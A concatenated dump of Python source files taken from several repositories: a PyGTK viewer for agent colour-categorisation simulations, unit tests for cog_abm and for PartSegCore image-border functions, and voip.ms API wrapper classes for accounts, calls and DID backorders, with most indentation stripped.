counter = 0
#focals = self.agent_data.focals[iter]
for nr, name in focals.iteritems():
counter += 1
if (counter == 22):
row += 2*self.CELLAR_SIZE
counter = 0
column = 0
self.gc.set_rgb_fg_color(self.colors[nr])
column += 2*self.CELLAR_SIZE
self.legend.window.draw_rectangle(self.gc, True, column, row,
self.CELLAR_SIZE, self.CELLAR_SIZE)
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("black"))
self.pangolayout.set_text(name)
self.legend.window.draw_layout(self.gc, column, row +
self.CELLAR_SIZE, self.pangolayout)
class MunsellPaletteInterface(object):
def __init__(self, path, agents_viewed, find_focal):
self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.window.set_title("Agent colour categories map")
self.window.set_position(gtk.WIN_POS_CENTER)
self.window.set_default_size(1280,-1)
self.iterations = []
self.stimuli = []
self.colors = []
self.agents_data = []
start_time = time()
self.init_wcs_template()
self.agent_WCSTable = []
self.get_results_from_folder(path)
print "Processing data..."
self.set_agents_data(find_focal)
print 'Done in:', time() - start_time,'s'
self.main_vbox = gtk.VBox(False, 2)
#self.template = WCSPalette(self.colors)
#self.main_vbox.add(self.template.area)
self.create_containers(agents_viewed)
self.main_vbox.add(self.scrolled_window)
self.init_WCSTable_to_agent_data()
self.panel = self.create_panel()
self.main_vbox.add(self.panel)
self.window.add(self.main_vbox)
if (self.window):
self.window.connect("destroy", gtk.main_quit)
self.window.show_all()
self.set_current_iteration_widgets(0)
def set_agents_data(self, find_focal):
for i in xrange(self.agents_size):
self.agents_data.append(AgentData(self.stimuli, find_focal))
for j in xrange(len(self.iterations)):
agent = self.result_set[j]
for i in xrange(len(agent)):
self.agents_data[i].handle_categories(j, agent[i])
def get_results_from_folder(self, path):
print "From: ", path
self.result_set = []
list = os.listdir(path)
for file in list:
(root, ext) = os.path.splitext(file)
if (ext == ".pout"):
print "Reading:", file
self.result_set.append(self.get_iteration_from_file
(os.path.join(path, file)))
zipped = zip(self.iterations, self.result_set)
zipped.sort()
(self.iterations, self.result_set) = zip(*zipped)
def get_iteration_from_file(self, source):
with open(source, 'r') as file:
tuple = cPickle.load(file)
self.iterations.append(tuple[0])
agents = tuple[1]
#constant number of agents for every iteration
self.agents_size = len(agents)
return agents
def init_wcs_template(self):
self.stimuli = get_WCS_colors()
for color in self.stimuli:
r, g, b, _ = self.convert_to_RGB(color)
self.colors.append(gtk.gdk.Color(r, g, b))
#print [self.stimuli[j].distance(self.stimuli[j+1]) for j in xrange(len(self.stimuli)-2)]
def create_containers(self, agent_viewed):
self.cat_size_labels = []
row = (agent_viewed-1)/2 +2
self.container = gtk.Table(row, AGENTS_CONTAINERS_IN_ROW, True)
self.container.set_row_spacings(6)
self.container.set_col_spacings(6)
wcs_palette = WCSPalette(self.colors)
self.container.attach(wcs_palette.area, 0, 1, 0, 1)
for i in xrange(agent_viewed):
r = i / AGENTS_CONTAINERS_IN_ROW + 1
c = i % AGENTS_CONTAINERS_IN_ROW
self.container.attach(self.create_agent_panel(i), c, c+1, r, r+1)
self.scrolled_window = gtk.ScrolledWindow()
self.scrolled_window.add_with_viewport(self.container)
self.scrolled_window.set_size_request(MAIN_CONTAINER_REQUESTED_WIDTH,
MAIN_CONTAINER_REQUESTED_HEIGHT)
def create_agent_panel(self, number):
combo = gtk.combo_box_new_text()
for i in xrange(self.agents_size):
combo.append_text("Agent " + str(i))
combo.set_active(number)
combo.connect('changed', self.changed_cb, number)
combo.set_size_request(50, 30)
cat_size_label = gtk.Label()
self.cat_size_labels.append(cat_size_label)
table = gtk.Table(2, 2, False)
table.attach(combo, 0, 1, 0, 1)
table.attach(cat_size_label, 1, 2, 0, 1)
wcs_table = WCSAgent(self.colors)
self.agent_WCSTable.append(wcs_table)
panel = gtk.VPaned()
panel.pack1(table)
panel.pack2(wcs_table.area)
#panel.show()
return panel
def create_panel(self):
self.close_button = gtk.Button("Close")
self.close_button.connect("clicked", gtk.main_quit)
self.close_button.set_size_request(150, 40)
#self.close_button.show()
self.scroll = gtk.HScrollbar()
self.scroll.set_size_request(150, 40)
self.scroll.set_update_policy(gtk.UPDATE_CONTINUOUS)
self.scroll.set_adjustment(gtk.Adjustment(0, 0,
len(self.iterations)-1, 1, 1, 0))
self.scroll.connect("value-changed", self.scroll_value_changed)
self.iteration_label = gtk.Label()
#self.scroll.show()
vbox = gtk.VBox(True, 2)
vbox.pack_start(self.iteration_label)
vbox.pack_start(self.scroll)
panel = gtk.Table(1, 3, True)
panel.set_col_spacings(15)
panel.attach(self.close_button, 2, 3, 0, 1)
panel.attach(vbox, 1, 2, 0, 1)
return panel
def changed_cb(self, combobox, cb_number):
index = combobox.get_active()
self.agent_WCSTable[cb_number].set_agent_data(self.agents_data[index])
self.agent_WCSTable[cb_number].paint_cellars(self.current_iteration)
        self.cat_size_labels[cb_number].set_text("Number of categories: " +
            str(self.agent_WCSTable[cb_number].get_number_of_categories(
                self.current_iteration)))
def scroll_value_changed(self, scroll):
        if (self.current_iteration == int(scroll.get_value())):
return
self.set_current_iteration_widgets(int(scroll.get_value()))
for i in xrange(len(self.agent_WCSTable)):
self.agent_WCSTable[i].paint_cellars(self.current_iteration)
def set_current_iteration_widgets(self, iter):
self.current_iteration = iter
self.scroll.set_value(iter)
self.iteration_label.set_text("Population iterations: "+
str(self.iterations[iter]))
for i in xrange(len(self.agent_WCSTable)):
self.cat_size_labels[i].set_text("Number of categories: " +
str(self.agent_WCSTable[i].get_number_of_categories(iter)))
def init_WCSTable_to_agent_data(self):
for tuple in zip(self.agents_data, self.agent_WCSTable):
tuple[1].set_agent_data(tuple[0])
def convert_to_RGB(self, color):
#c1 = grapefruit.Color.NewFromLab(color.L, color.a/100, color.b/100, wref=grapefruit.Color.WHITE_REFERENCE['std_D50'])
#c2 = grapefruit.Color.NewFromLab(color.L, color.a/100, color.b/100, wref=grapefruit.Color.WHITE_REFERENCE['std_D65'])
#if c1 is c2:
# print c1, c2
        return grapefruit.Color.NewFromLab(color.L, color.a/100, color.b/100,
            wref=grapefruit.Color.WHITE_REFERENCE['std_D65'])
def main(self):
gtk.main()
class MunsellPaletteInterfaceWithLanguage(MunsellPaletteInterface):
def set_agents_data(self, find_focal):
for i in xrange(self.agents_size):
self.agents_data.append(AgentDataWithLanguage(self.stimuli,
find_focal))
self.population = Population(self.stimuli)
for j in xrange(len(self.iterations)):
agent = self.result_set[j]
for i in xrange(len(agent)):
try:
self.agents_data[i].handle_categories(j, agent[i])
except:
print "Could not handle agent categories:",
sys.exc_info()[0]
#sys.exit()
self.population.handle_categories(j, self.agents_data)
def create_containers(self, agent_viewed):
super(MunsellPaletteInterfaceWithLanguage,
self).create_containers(agent_viewed)
self.container.attach(self.create_population_view(), 1, 2, 0, 1)
def create_agent_panel(self, number):
combo = gtk.combo_box_new_text()
for i in xrange(self.agents_size):
combo.append_text("Agent " + str(i))
combo.set_active(number)
combo.connect('changed', self.changed_cb, number)
combo.set_size_request(50, 30)
cat_size_label = gtk.Label()
self.cat_size_labels.append(cat_size_label)
table = gtk.Table(2, 2, False)
table.attach(combo, 0, 1, 0, 1)
table.attach(cat_size_label, 1, 2, 0, 1)
wcs_table = WCSAgentWithLegend(self.colors)
window = gtk.ScrolledWindow()
window.add_with_viewport(wcs_table.legend)
window.set_size_request(-1, 50)
window.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
table.attach(window, 0, 2, 1, 2)
self.agent_WCSTable.append(wcs_table)
panel = gtk.VPaned()
panel.pack1(table)
panel.pack2(wcs_table.area)
#panel.show()
return panel
def create_population_view(self):
self.population_cat_label = gtk.Label()
name_label = gtk.Label("Population")
table = gtk.Table(2, 2, False)
table.attach(self.population_cat_label, 1, 2, 0, 1)
table.attach(name_label, 0, 1, 0, 1)
wcs_table = WCSAgentWithLegend(self.colors)
window = gtk.ScrolledWindow()
window.add_with_viewport(wcs_table.legend)
window.set_size_request(-1, 50)
window.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
table.attach(window, 0, 2, 1, 2)
self.population_view = wcs_table
panel = gtk.VPaned()
panel.pack1(table)
panel.pack2(wcs_table.area)
#panel.show()
return panel
def scroll_value_changed(self, scroll):
        if (self.current_iteration == int(scroll.get_value())):
return
super(MunsellPaletteInterfaceWithLanguage,
self).scroll_value_changed(scroll)
self.population_view.paint_cellars(self.current_iteration)
def set_current_iteration_widgets(self, iter):
super(MunsellPaletteInterfaceWithLanguage,
self).set_current_iteration_widgets(iter)
        self.population_cat_label.set_text("Number of categories: " +
            str(self.population.get_number_of_categories(self.current_iteration)))
def init_WCSTable_to_agent_data(self):
super(MunsellPaletteInterfaceWithLanguage, self). \
init_WCSTable_to_agent_data()
self.population_view.set_agent_data(self.population)
if __name__ == "__main__":
import optparse
optp = optparse.OptionParser()
optp.add_option('-a','--agents', action="store", dest='agents', type="int",
help="Number of agents viewed", default=10)
optp.add_option('-d','--directory', action="store", dest='directory',
type="string", help="Directory with input data")
optp.add_option('-f','--findfocal', action="store", type="string",
dest="find_focal", help="Determines which 'find_focal' algorithm will \
be used ('normal' as default or 'strength_based')", default="normal")
optp.add_option('-l', '--legend', action="store", type="string", dest=
"legend", help="Type true to show language sharing", default="false")
# Parse the arguments (defaults to parsing sys.argv).
opts, args = optp.parse_args()
if (str2bool(opts.legend) == 1):
mpi = MunsellPaletteInterfaceWithLanguage(opts.directory, opts.agents,
opts.find_focal)
else:
mpi = MunsellPaletteInterface(opts.directory, opts.agents,
opts.find_focal)
mpi.main()
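# Hedged usage note (not part of the original script): assuming this module is saved
# as wcs_viewer.py and the *.pout result files live in ./results, a run showing 10
# agents with the language-sharing legend could be started like this:
#
#   python wcs_viewer.py -d ./results -a 10 -f normal -l true
#
# The script file name and the results directory are assumptions for illustration;
# the option names come from the optparse setup above.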
```
#### File: src/test/test_agent_state.py
```python
import sys
sys.path.append('../')
import unittest
from cog_abm.agent.state import *
class TestAgentState(unittest.TestCase):
def setUp(self):
pass
if __name__ == '__main__':
unittest.main()
```
#### File: src/test/test_ml_core.py
```python
import math
import random
import unittest
from cog_abm.ML.core import (NominalAttribute, NumericAttribute, Sample,
load_samples_arff, split_data, split_data_cv)
animals = ["dog", "cat", "lion", "duck", "python:)"]
class TestAttributes(unittest.TestCase):
def setUp(self):
self.symbols = animals
self.na = NominalAttribute(self.symbols)
def test_numeric_attr_getting_value(self):
na = NumericAttribute()
for i in xrange(10):
self.assertEqual(i, na.get_value(i))
def test_nominal_attr_getting_value(self):
na = NominalAttribute(self.symbols)
for i, s in enumerate(self.symbols):
self.assertEqual(s, na.get_value(i))
self.assertEqual(s, na.get_symbol(i))
self.assertEqual(i, na.get_idx(s))
def test_equality(self):
self.assertEqual(self.na, NominalAttribute(animals))
self.assertEqual(self.na,
NominalAttribute(["dog", "cat", "lion", "duck", "python:)"]))
self.assertNotEqual(self.na, NominalAttribute(animals + ["donkey"]))
self.assertEqual(NumericAttribute(), NumericAttribute())
self.assertNotEqual(self.na, NumericAttribute())
class TestSample(unittest.TestCase):
def setUp(self):
self.meta = [NumericAttribute(), NominalAttribute(animals)]
self.sample = Sample([1.2, self.meta[1].get_idx("dog")], self.meta)
self.meta_cl = NominalAttribute(animals)
self.sample_cl = Sample([100, self.meta[1].get_idx("cat")], self.meta,
self.meta_cl.get_idx("duck"), self.meta_cl)
def test_basic(self):
self.assertIsNone(self.sample.get_cls())
self.assertEqual(self.sample_cl.get_cls(), "duck")
self.assertEqual(self.sample.get_values(), [1.2, "dog"])
self.assertEqual(self.sample_cl.get_values(), [100, "cat"])
def test_equality(self):
self.assertNotEqual(self.sample, self.sample_cl)
meta = [NumericAttribute(), NominalAttribute(animals)]
sample = Sample([1.2, meta[1].get_idx("dog")], meta)
self.assertEqual(self.sample, sample)
self.assertNotEqual(self.sample, self.sample_cl)
meta = [NumericAttribute(), NominalAttribute(animals), NumericAttribute()]
sample = Sample([1.2, meta[1].get_idx("dog"), 3.14], meta)
self.assertNotEqual(self.sample, sample)
self.assertNotEqual(self.sample_cl, sample)
meta = [NumericAttribute(), NominalAttribute(animals)]
sample = Sample([1.2, meta[1].get_idx("cat")], meta)
self.assertNotEqual(self.sample, sample)
self.assertNotEqual(self.sample_cl, sample)
sample = Sample([1.3, meta[1].get_idx("dog")], meta)
self.assertNotEqual(self.sample, sample)
self.assertNotEqual(self.sample_cl, sample)
sample = Sample([100, self.meta[1].get_idx("cat")], self.meta,
self.meta_cl.get_idx("duck"), self.meta_cl)
self.assertEqual(self.sample_cl, sample)
self.assertNotEqual(self.sample, sample)
sample = Sample([10.20, self.meta[1].get_idx("cat")], self.meta,
self.meta_cl.get_idx("duck"), self.meta_cl)
self.assertNotEqual(self.sample, sample)
self.assertNotEqual(self.sample_cl, sample)
class TestSamplePreparation(unittest.TestCase):
def setUp(self):
self.samples = load_samples_arff("test/iris.arff")
def test_loading_arff(self):
expected_meta = [NumericAttribute() for _ in xrange(4)]
expected_cls_meta = NominalAttribute(
["Iris-setosa", "Iris-versicolor", "Iris-virginica"])
sample = self.samples[0]
self.assertEqual(sample.meta, expected_meta)
self.assertEqual(sample.cls_meta, expected_cls_meta)
def test_spliting_samples(self):
for _ in xrange(100):
split_ratio = random.random()
train, test = split_data(self.samples, split_ratio)
self.assertEqual(math.ceil(len(self.samples) * split_ratio), len(train))
self.assertEqual(len(self.samples), len(train) + len(test))
def test_split_data_cv(self):
N = 100
for _ in xrange(100):
samples = range(N)
folds = random.randint(2, N / 3)
sets = split_data_cv(samples, folds)
for train, test in sets:
for ts in test:
self.assertTrue(ts not in train)
self.assertTrue(N / folds <= len(test) <= N / folds + 1)
self.assertEqual(N, len(test) + len(train))
```
#### File: src/test/test_simulation.py
```python
import sys
sys.path.append('../')
import unittest
from cog_abm.core.simulation import *
class TestSimulation(unittest.TestCase):
def setUp(self):
pass
class TestMultiThreadSimulation(unittest.TestCase):
def setUp(self):
from cog_abm.extras.additional_tools import generate_network_with_agents
from cog_abm.extras.additional_tools import SimpleInteraction
network, agents = generate_network_with_agents(10)
self.network = network
self.agents = agents
print network.agents
print network.nodes
print "___________"
print agents
self.interaction = SimpleInteraction(2)
# def testBasic(self):
# simulation = MultithreadSimulation(3, graph = self.network,
# interaction = self.interaction, agents = self.agents)
#
# simulation.run(1000, 50)
```
#### File: src/test/test_tools.py
```python
import sys
sys.path.append('../')
import unittest
from cog_abm.extras.tools import calc_auc
class TestAucCalculations(unittest.TestCase):
def setUp(self):
pass
def test_auc(self):
test_data = [
([(0, 0), (1, 2), (2, 0)], 2.),
([(0, 1), (1, 1)], 1),
([(0., 0.5), (1, 2), (2, 2.)], 1.25 + 2.)
]
for curve, expected_auc in test_data:
self.assertEqual(expected_auc, calc_auc(curve))
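# Worked check of the first test case above, assuming calc_auc integrates the
# piecewise-linear curve with the trapezoidal rule (which the expected values imply):
#   segment (0,0)->(1,2): (0 + 2) / 2 * 1 = 1.0
#   segment (1,2)->(2,0): (2 + 0) / 2 * 1 = 1.0
#   total AUC = 2.0, matching the expected value in test_data.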
``` |
{
"source": "4DNucleome/PartSegCore-compiled-backend",
"score": 2
} |
#### File: src/tests/test_coloring.py
```python
from itertools import product
import numpy as np
import pytest
from PartSegCore_compiled_backend.color_image_cython import calculate_borders, calculate_borders2d
@pytest.mark.parametrize("label_type", [np.uint8, np.uint16, np.uint32])
def test_calculate_borders(label_type):
layers = np.zeros((1, 10, 10, 10), dtype=label_type)
layers[:, 3:-3, 3:-3, 3:-3] = 1
res = calculate_borders(layers, 0, False)
expected = layers.copy()
expected[:, 4:-4, 4:-4, 4:-4] = 0
assert np.all(res == expected)
res = calculate_borders(layers, 0, True)
expected = layers.copy()
expected[:, :, 4:-4, 4:-4] = 0
assert np.all(res == expected)
res = calculate_borders2d(layers, 0)
assert np.all(res == expected)
@pytest.mark.parametrize("label_type", [np.uint8, np.uint16, np.uint32])
def test_calculate_borders_thick(label_type):
layers = np.zeros((1, 16, 16, 16), dtype=label_type)
layers[:, 3:-3, 3:-3, 3:-3] = 1
res = calculate_borders(layers, 1, False)
expected = np.zeros((1, 16, 16, 16), dtype=np.uint8)
expected[:, 2:-2, 2:-2, 2:-2] = 1
expected[:, 5:-5, 5:-5, 5:-5] = 0
for c1, c2 in product([2, -3], repeat=2):
for x in range(3):
cord = [c1, c2]
cord.insert(x, slice(None))
expected[tuple([0] + cord)] = 0
assert np.all(res == expected)
@pytest.mark.parametrize("label_type", [np.uint8, np.uint16, np.uint32])
def test_calculate_borders_thick2d(label_type):
layers = np.zeros((1, 16, 16, 16), dtype=label_type)
layers[:, 3:-3, 3:-3, 3:-3] = 1
res1 = calculate_borders(layers, 1, True)
res2 = calculate_borders2d(layers, 1)
assert np.all(res1 == res2)
expected = np.zeros((1, 16, 16, 16), dtype=np.uint8)
expected[:, 3:-3, 2:-2, 2:-2] = 1
expected[:, :, 5:-5, 5:-5] = 0
for c1, c2 in product([2, -3], repeat=2):
expected[0, :, c1, c2] = 0
assert np.all(res1 == expected)
assert np.all(res2 == expected)
```
#### File: tests/test_sprawl_utils/test_euclidean.py
```python
from itertools import product
import numpy as np
import pytest
from PartSegCore_compiled_backend.sprawl_utils.euclidean_cython import calculate_euclidean
@pytest.fixture
def cube_data():
data = np.zeros((10, 10, 10), dtype=np.uint8)
data[3:-3, 3:-3, 3:-3] = 1
return data
@pytest.fixture
def neigh():
return np.array([x for x in product(range(-1, 2), repeat=3) if x != (0, 0, 0)], dtype=np.int8)
def test_calculate_euclidean(cube_data, neigh):
res = calculate_euclidean(
np.ones(cube_data.shape, dtype=np.uint8), cube_data, neigh, np.max(np.abs(neigh), axis=1).astype(np.float64)
)
expected = np.ones(cube_data.shape, dtype=np.uint8) * 3
expected[1:-1, 1:-1, 1:-1] = 2
expected[2:-2, 2:-2, 2:-2] = 1
expected[3:-3, 3:-3, 3:-3] = 0
assert np.all(res == expected)
def test_calculate_euclidean_mask(cube_data, neigh):
mask = np.zeros(cube_data.shape, dtype=np.uint8)
mask[1:-1, 1:-1, 1:-1] = 1
res = calculate_euclidean(mask, cube_data, neigh, np.max(np.abs(neigh), axis=1).astype(np.float64))
expected = np.zeros(cube_data.shape, dtype=np.float64)
expected[:] = np.inf
expected[1:-1, 1:-1, 1:-1] = 2
expected[2:-2, 2:-2, 2:-2] = 1
expected[3:-3, 3:-3, 3:-3] = 0
assert np.all(res == expected)
``` |
{
"source": "4doom4/python-voipms",
"score": 2
} |
#### File: voipms/entities/accountsdelete.py
```python
from voipms.baseapi import BaseApi
class AccountsDelete(BaseApi):
"""
Delete for the Accounts endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(AccountsDelete, self).__init__(*args, **kwargs)
self.endpoint = 'accounts'
def sub_account(self, account_id):
"""
        Deletes a specific Sub Account from your Account
        :param account_id: ID for a specific Sub Account (Example: 99785)
        :type account_id: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "delSubAccount"
parameters = {}
if account_id:
if not isinstance(account_id, int):
raise ValueError("ID for a specific Sub Account as int (Example: 99785) ")
parameters["id"] = account_id
return self._voipms_client._get(method, parameters)
```
#### File: voipms/entities/accountsget.py
```python
from voipms.baseapi import BaseApi
class AccountsGet(BaseApi):
"""
Get for the Accounts endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(AccountsGet, self).__init__(*args, **kwargs)
self.endpoint = 'accounts'
def allowed_codecs(self, codec=None):
"""
Retrieves a list of Allowed Codecs if no additional parameter is provided
- Retrieves a specific Allowed Codec if a codec code is provided
:param auth_type: Code for a specific Codec (Example: 'ulaw;g729;gsm')
:type auth_type: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getAllowedCodecs"
parameters = {}
if codec:
if not isinstance(codec, str):
raise ValueError("Code for a specific Codec as str (Example: 'ulaw')")
parameters["codec"] = codec
return self._voipms_client._get(method, parameters)
def auth_types(self, auth_type=None):
"""
Retrieves a list of Authentication Types if no additional parameter is provided
- Retrieves a specific Authentication Type if an auth type code is provided
:param auth_type: Code for a specific Authorization Type (Example: 2)
:type auth_type: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getAuthTypes"
parameters = {}
if auth_type:
if not isinstance(auth_type, int):
raise ValueError("Code for a specific Authorization Type as int (Example: 2)")
parameters["type"] = auth_type
return self._voipms_client._get(method, parameters)
def device_types(self, device_type=None):
"""
Retrieves a list of Device Types if no additional parameter is provided
- Retrieves a specific Device Type if a device type code is provided
:param device_type: Code for a specific Device Type (Example: 1)
:type device_type: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getDeviceTypes"
parameters = {}
if device_type:
if not isinstance(device_type, int):
raise ValueError("Code for a specific Device Type as int (Example: 1)")
parameters["device_type"] = device_type
return self._voipms_client._get(method, parameters)
def dtmf_modes(self, dtmf_mode=None):
"""
Retrieves a list of DTMF Modes if no additional parameter is provided
- Retrieves a specific DTMF Mode if a DTMF mode code is provided
:param dtmf_mode: Code for a specific DTMF Mode (Example: 'inband')
:type dtmf_mode: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getDTMFModes"
parameters = {}
if dtmf_mode:
if not isinstance(dtmf_mode, str):
raise ValueError("Code for a specific DTMF Mode as str (Example: 'inband')")
parameters["dtmf_mode"] = dtmf_mode
return self._voipms_client._get(method, parameters)
def lock_international(self, lock_international=None):
"""
Retrieves a list of Lock Modes if no additional parameter is provided
- Retrieves a specific Lock Mode if a lock code is provided
:param lock_international: Code for a specific Lock International Mode (Example: 1)
:type lock_international: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getLockInternational"
parameters = {}
if lock_international:
if not isinstance(lock_international, int):
raise ValueError("Code for a specific Lock International Mode as int (Example: 1)")
parameters["lock_international"] = lock_international
return self._voipms_client._get(method, parameters)
def music_on_hold(self, music_on_hold=None):
"""
Retrieves a list of Music on Hold Options if no additional parameter is provided
- Retrieves a specific Music on Hold Option if a MOH code is provided
:param music_on_hold: Code for a specific Music on Hold (Example: 'jazz')
:type music_on_hold: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getMusicOnHold"
parameters = {}
if music_on_hold:
if not isinstance(music_on_hold, str):
raise ValueError("Code for a specific Music on Hold as str (Example: 'jazz')")
parameters["music_on_hold"] = music_on_hold
return self._voipms_client._get(method, parameters)
def nat(self, nat=None):
"""
Retrieves a list of NAT Options if no additional parameter is provided
- Retrieves a specific NAT Option if a NAT code is provided
:param nat: Code for a specific NAT Option (Example: 'route')
:type nat: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getNAT"
parameters = {}
if nat:
if not isinstance(nat, str):
raise ValueError("Code for a specific NAT Option as str (Example: 'route')")
parameters["nat"] = nat
return self._voipms_client._get(method, parameters)
def protocols(self, protocol=None):
"""
Retrieves a list of Protocols if no additional parameter is provided
- Retrieves a specific Protocol if a protocol code is provided
:param protocol: Code for a specific Protocol (Example: 3)
:type protocol: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getProtocols"
parameters = {}
if protocol:
if not isinstance(protocol, int):
raise ValueError("Code for a specific Protocol as int (Example: 3)")
parameters["protocol"] = protocol
return self._voipms_client._get(method, parameters)
def registration_status(self, account):
"""
Retrieves the Registration Status of a specific account
:param account: Specific Account (Example: '100001_VoIP')
:type account: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getRegistrationStatus"
parameters = {}
if account:
if not isinstance(account, str):
raise ValueError("Specific Account as str (Example: '100001_VoIP')")
parameters["account"] = account
else:
raise ValueError("Specific Account (Example: '100001_VoIP')")
return self._voipms_client._get(method, parameters)
def report_estimated_hold_time(self, time_type=None):
"""
        Retrieves a list of 'ReportEstimatedHoldTime' Types if no additional parameter is provided
        - Retrieves a specific 'ReportEstimatedHoldTime' Type if a type code is provided
:param time_type: Code for a specific 'ReportEstimatedHoldTime' Type (Example: 'yes')
:type time_type: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getReportEstimatedHoldTime"
parameters = {}
if time_type:
if not isinstance(time_type, str):
raise ValueError("Code for a specific ReportEstimatedHoldTime Type as str (Example: 'yes')")
parameters["type"] = time_type
return self._voipms_client._get(method, parameters)
def routes(self, route=None):
"""
Retrieves a list of Route Options if no additional parameter is provided
- Retrieves a specific Route Option if a route code is provided
:param route: Code for a specific Route (Example: 2)
:type route: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getRoutes"
parameters = {}
if route:
if not isinstance(route, int):
raise ValueError("Code for a specific Route as int (Example: 2)")
parameters["route"] = route
return self._voipms_client._get(method, parameters)
def sub_accounts(self, account=None):
"""
Retrieves all Sub Accounts if no additional parameter is provided
- Retrieves Reseller Client Accounts if Reseller Client ID is provided
- Retrieves a specific Sub Account if a Sub Account is provided
:param account: Parameter could have the following values:
* Empty Value [Not Required]
* Specific Sub Account (Example: '100000_VoIP')
* Specific Reseller Client ID (Example: 561115)
:type account: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getSubAccounts"
parameters = {}
if account:
if not isinstance(account, str):
raise ValueError("Parameter could have the following values: Empty Value, Specific Sub Account (Example: '100000_VoIP'), Specific Reseller Client ID (Example: 561115)")
parameters["account"] = account
return self._voipms_client._get(method, parameters)
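# Hedged usage sketch (not part of this module): assuming an already-initialised
# top-level voip.ms client object is available as `client` and exposes this endpoint
# as `client.accounts.get` (both names are assumptions here), the getters above would
# be called like this:
#
#   client.accounts.get.registration_status('100001_VoIP')
#   client.accounts.get.sub_accounts()   # all sub accounts
#   client.accounts.get.routes(2)        # a single route by its code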
```
#### File: voipms/entities/accounts.py
```python
from voipms.baseapi import BaseApi
from voipms.entities.accountscreate import AccountsCreate
from voipms.entities.accountsdelete import AccountsDelete
from voipms.entities.accountsget import AccountsGet
from voipms.entities.accountsset import AccountsSet
class Accounts(BaseApi):
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(Accounts, self).__init__(*args, **kwargs)
        self.endpoint = 'accounts'
self.create = AccountsCreate(self)
self.delete = AccountsDelete(self)
self.get = AccountsGet(self)
self.set = AccountsSet(self)
```
#### File: voipms/entities/calls.py
```python
from voipms.baseapi import BaseApi
from voipms.entities.callsget import CallsGet
class Calls(BaseApi):
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(Calls, self).__init__(*args, **kwargs)
        self.endpoint = 'calls'
self.get = CallsGet(self)
```
#### File: voipms/entities/didsback_order.py
```python
from voipms.baseapi import BaseApi
from voipms.helpers import order
class DidsBackOrder(BaseApi):
"""
BackOrder for the Dids endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(DidsBackOrder, self).__init__(*args, **kwargs)
self.endpoint = 'dids'
def back_order_did_can(self, quantity, province, ratecenter, routing, pop, dialtime, cnam, billing_type, **kwargs):
"""
        Backorder DID (Canada) from a specific ratecenter and province
:param quantity: [Required] Number of DIDs to be Ordered (Example: 3)
:type quantity: :py:class:`int`
:param province: [Required] Canadian Province (values from dids.get_provinces)
:type province: :py:class:`str`
:param ratecenter: [Required] Canadian Ratecenter (Values from dids.get_rate_centers_can)
:type ratecenter: :py:class:`str`
:param routing: [Required] Main Routing for the DID
:type routing: :py:class:`str`
:param pop: [Required] Point of Presence for the DID (Example: 5)
:type pop: :py:class:`int`
:param dialtime: [Required] Dial Time Out for the DID (Example: 60 -> in seconds)
:type dialtime: :py:class:`int`
:param cnam: [Required] CNAM for the DID (Boolean: True/False)
:type cnam: :py:class:`bool`
:param billing_type: [Required] Billing type for the DID (1 = Per Minute, 2 = Flat)
:type billing_type: :py:class:`int`
:param **kwargs: All optional parameters
:type **kwargs: :py:class:`dict`
:param failover_busy: Busy Routing for the DID
:type failover_busy: :py:class:`str`
:param failover_unreachable: Unreachable Routing for the DID
:type failover_unreachable: :py:class:`str`
:param failover_noanswer: NoAnswer Routing for the DID
:type failover_noanswer: :py:class:`str`
:param voicemail: Voicemail for the DID (Example: 101)
:type voicemail: :py:class:`int`
:param callerid_prefix: Caller ID Prefix for the DID
:type callerid_prefix: :py:class:`str`
:param note: Note for the DID
:type note: :py:class:`str`
:param test: Set to True if testing how Orders work
- Orders can not be undone
- When testing, no Orders are made
:type test: :py:class:`bool`
:returns: :py:class:`dict`
routing, failover_busy, failover_unreachable and failover_noanswer
can receive values in the following format => header:record_id
Where header could be: account, fwd, vm, sip, grp, ivr, sys, recording, queue, cb, tc, disa, none.
Examples:
account Used for routing calls to Sub Accounts
You can get all sub accounts using the accounts.get_sub_accounts function
fwd Used for routing calls to Forwarding entries.
You can get the ID right after creating a Forwarding with setForwarding
or by requesting all forwardings entries with getForwardings.
vm Used for routing calls to a Voicemail.
You can get all voicemails and their IDs using the voicemail.get_voicemails function
sys System Options:
hangup = Hangup the Call
busy = Busy tone
noservice = System Recording: Number not in service
disconnected = System Recording: Number has been disconnected
dtmf = DTMF Test
echo = ECHO Test
none Used to route calls to no action
Examples:
'account:100001_VoIP'
'fwd:1026'
'vm:101'
'none:'
'sys:echo'
"""
method = "backOrderDIDCAN"
kwargs.update({
"method": method,
"quantity": quantity,
"province": province,
"ratecenter": ratecenter,
"routing": routing,
"pop": pop,
"dialtime": dialtime,
"cnam": cnam,
"billing_type": billing_type,
})
return self._voipms_client._get(order(**kwargs))
def back_order_did_usa(self, quantity, state, ratecenter, routing, pop, dialtime, cnam, billing_type, **kwargs):
"""
Backorder DID (USA) from a specific ratecenter and state
:param quantity: [Required] Number of DIDs to be Ordered (Example: 3)
:type quantity: :py:class:`int`
:param state: [Required] USA State (values from dids.get_states)
:type state: :py:class:`str`
:param ratecenter: [Required] USA Ratecenter (Values from dids.get_rate_centers_usa)
:type ratecenter: :py:class:`str`
:param routing: [Required] Main Routing for the DID
:type routing: :py:class:`str`
:param pop: [Required] Point of Presence for the DID (Example: 5)
:type pop: :py:class:`int`
